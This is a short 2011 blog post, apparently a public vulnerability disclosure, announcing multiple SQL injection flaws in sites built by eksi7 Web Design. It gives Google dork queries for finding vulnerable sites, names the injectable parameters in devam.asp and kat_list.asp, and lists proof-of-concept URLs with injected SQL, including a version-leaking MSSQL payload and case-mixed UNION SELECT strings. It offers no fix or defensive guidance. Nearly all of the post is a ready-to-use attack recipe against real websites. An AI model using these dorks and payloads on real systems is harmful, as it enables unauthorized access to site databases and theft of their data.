Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection


Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"


MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]

POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version


JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]

POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a


thanks,
-p0pc0rn-
Share:

0 comments: